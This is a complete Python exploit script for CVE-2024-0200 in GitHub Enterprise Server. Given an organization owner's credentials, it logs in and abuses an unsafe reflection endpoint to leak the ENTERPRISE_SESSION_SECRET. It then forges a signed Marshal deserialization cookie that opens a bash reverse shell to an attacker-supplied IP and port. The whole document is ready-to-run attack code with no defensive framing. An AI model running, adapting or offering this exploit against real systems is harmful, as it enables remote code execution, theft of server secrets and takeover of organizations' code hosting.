README.md
Rendering markdown...
import re
import hmac
import json
import base64
import random
import string
import hashlib
import argparse
import requests
import urllib.parse
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class Exploit():
def __init__(self, target, username, password, connect_back_ip, connect_back_port):
self.base_url = target.rstrip('/')
self.base_api_url = f'{self.base_url}/api/v3'
self.username = username
self.password = password
self.connect_back_ip = connect_back_ip
self.connect_back_port = connect_back_port
self.web_session = requests.Session()
self.api_session = requests.Session()
self.api_session.auth = (username, password)
self.org_name = ''
self.secret = ''
# Function to check if the user is an organization owner
def check_organization_owner(self):
print("Checking if user is an organization owner...")
url = f'{self.base_api_url}/user/orgs'
response = self.api_session.get(url, verify=False)
orgs = response.json()
if response.status_code == 200:
for org in orgs:
role = self.get_user_role(org['login'])
if role == 'admin':
self.org_name = org['login']
return True
return False
# Function to get the user's role in an organization
def get_user_role(self, org_name):
url = f'{self.base_api_url}/orgs/{org_name}/memberships/{self.username}'
response = self.api_session.get(url, verify=False)
if response.status_code == 200:
membership = response.json()
return membership['role']
else:
return None
# Generate a random alphanumeric string of given length.
def generate_random_string(self, length):
alphanumeric_chars = string.ascii_letters + string.digits
return ''.join(random.choice(alphanumeric_chars) for _ in range(length))
# Creates a new repository in an organization.
def create_repository(self, repo_name):
url = f'{self.base_api_url}/orgs/{self.org_name}/repos'
data = {
'name': repo_name
}
response = self.api_session.post(url, json=data, verify=False)
if response.status_code == 201:
print(f'Repository "{repo_name}" created successfully in organization "{self.org_name}"!')
else:
raise Exception(f'Failed to create repository "{repo_name}" in organization "{self.org_name}"')
# Checks if any repository exists in the organization. If not, creates one.
def make_sure_repo_exists(self):
print("Checking if at least one repository exists in the organization...")
url = f"{self.base_api_url}/orgs/{self.org_name}/repos"
response = self.api_session.get(url, verify=False)
if response.status_code == 200:
repositories = response.json()
if not repositories:
print("No repositories found. Creating a new one...")
self.create_repository(self.generate_random_string(10))
else:
print("Repositories exist in the organization.")
else:
raise Exception("Failed to fetch repositories.")
# Fetch CSRF token from the login page.
def get_csrf_token(self):
url = f"{self.base_url}/login"
response = self.web_session.get(url, verify=False)
soup = BeautifulSoup(response.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'authenticity_token'}).get('value')
return csrf_token
# Send a POST request to login using the provided credentials and CSRF token.
def login(self, csrf_token):
url = f"{self.base_url}/session"
data = {
'login': self.username,
'password': self.password,
'commit': 'Sign in',
'authenticity_token': csrf_token,
}
response = self.web_session.post(url, data=data, verify=False)
return 'Sign out' in response.text
# Login in the Web application
def do_login(self):
print("Trying to login in the web app...")
# Step 1: Get CSRF Token
csrf_token = self.get_csrf_token()
print("CSRF Token:", csrf_token)
# Step 2: Login
login_response = self.login(csrf_token)
return login_response
# Finds the token value "ENTERPRISE_SESSION_SECRET"=>"xxx" in the provided data
def find_token_value(self, content):
pattern = r'"ENTERPRISE_SESSION_SECRET"=>"([^"]+)"'
match = re.search(pattern, content)
if match:
return match.group(1)
else:
return None
# Using the unsafe reflection, leak ENTERPRISE_SESSION_SECRET via restore_objects method
def leak_session_secret(self):
if not self.do_login():
raise("Login error, Aborting")
print("Login OK")
print("Triggering Unsafe Reflection")
url = f"{self.base_url}/organizations/{self.org_name}/settings/actions/repository_items"
response = self.web_session.get(url, params={"page": 1, "rid_key": "restore_objects"}, verify=False)
soup = BeautifulSoup(response.text, 'html.parser')
data = soup.find('input', {'name': 'repository_ids[]'}).get('value')
self.secret = self.find_token_value(data)
print(f"Found ENTERPRISE_SESSION_SECRET: {self.secret}")
# Get RCE via Cookies Marshal deserialization
def rce(self):
code = f"`bash -c 'bash -i >& /dev/tcp/{self.connect_back_ip}/{self.connect_back_port} 0>&1 &'`"
print("Sending RCE payload...")
marshal_template = (
"\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instance"
"o:\x1DAqueduct::Worker::Worker\a:\v@childI\"\x026\x0199999999; AAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAA\x06:\x06ET:\f@loggero:\vLogger\x00:\f@method:\x0Fkill_ch"
"ild:\t@varI\"\x10@kill_child\x06;\tT:\x10@deprecatoro:\x1FActiveSupport::Deprecation"
"\x06:\x0E@silencedT"
)
code = code.replace('"','\"')
marshal_code = marshal_template.replace("A" * 300, code + ";" + "A" * (300 - len(code) - 1))
marshal_encoded = base64.b64encode(bytes(marshal_code, 'UTF-8')).rstrip()
digest = hmac.new(bytes(self.secret, 'UTF-8'), marshal_encoded, hashlib.sha1).hexdigest()
marshal_encoded = urllib.parse.quote(marshal_encoded)
session_cookie = "%s--%s" % (marshal_encoded, digest)
print(session_cookie)
cookies = {'_gh_render': session_cookie}
requests.get(self.base_url, cookies=cookies, verify=False)
print("Done")
def run(self):
if not self.check_organization_owner():
print(f'You are not an organization owner. Aborting since this is an requirement for the exploit.')
return
print(f"User is an owner of organization {self.org_name}")
self.make_sure_repo_exists()
self.leak_session_secret()
self.rce()
def main():
parser = argparse.ArgumentParser(description='CVE-2024-0200 exploit')
parser.add_argument('target', type=str, help='Target base URL')
parser.add_argument('username', type=str, help='Username for login')
parser.add_argument('password', type=str, help='Password for login')
parser.add_argument('connect_back_ip', type=str, help='Connect back IP')
parser.add_argument('connect_back_port', type=str, help='Connect back Port')
args = parser.parse_args()
xpl = Exploit(args.target, args.username, args.password,
args.connect_back_ip, args.connect_back_port)
xpl.run()
if __name__ == '__main__':
main()